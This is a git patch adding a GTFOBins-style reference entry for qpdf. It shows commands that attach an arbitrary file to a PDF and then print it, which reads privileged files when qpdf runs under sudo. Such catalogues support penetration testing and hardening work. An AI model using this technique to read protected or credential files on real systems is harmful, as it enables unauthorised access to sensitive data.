From c53efd1bfae899af6b9e9cdf2231c90b7ac65e2e Mon Sep 17 00:00:00 2001
From: Sohail Saha <captainwoof.official@gmail.com>
Date: Tue, 9 Apr 2024 19:31:37 +0530
Subject: [PATCH] Added qpdf arbitrary file read

---
 _gtfobins/qpdf.md | 10 ++++++++++
 1 file changed, 10 insertions(+)
 create mode 100644 _gtfobins/qpdf.md

diff --git a/_gtfobins/qpdf.md b/_gtfobins/qpdf.md
new file mode 100644
index 0000000..ba4d03b
--- /dev/null
+++ b/_gtfobins/qpdf.md
@@ -0,0 +1,10 @@
+---
+description: QPDF is both a software library and a free command-line program that can convert one PDF file to another equivalent PDF file. It is capable of performing transformations such as linearization, encryption, and decryption of PDF files.
+functions:
+  file-read:
+    - description: `qpdf` can be used to read any arbitrary file accessible to the running user, by attaching the target file to a valid PDF file, and then accessing that attachment. If the user is allowed to run `qpdf` as an elevated user (e.g with `sudo`), privileged files can be read.
+      code: |
+        FILE_TO_READ="/path/to/file"
+        qpdf --qdf --add-attachment $FILE_TO_READ --key=anykey -- valid.pdf output.pdf
+        qpdf --show-attachment=anykey output.pdf
+---
\ No newline at end of file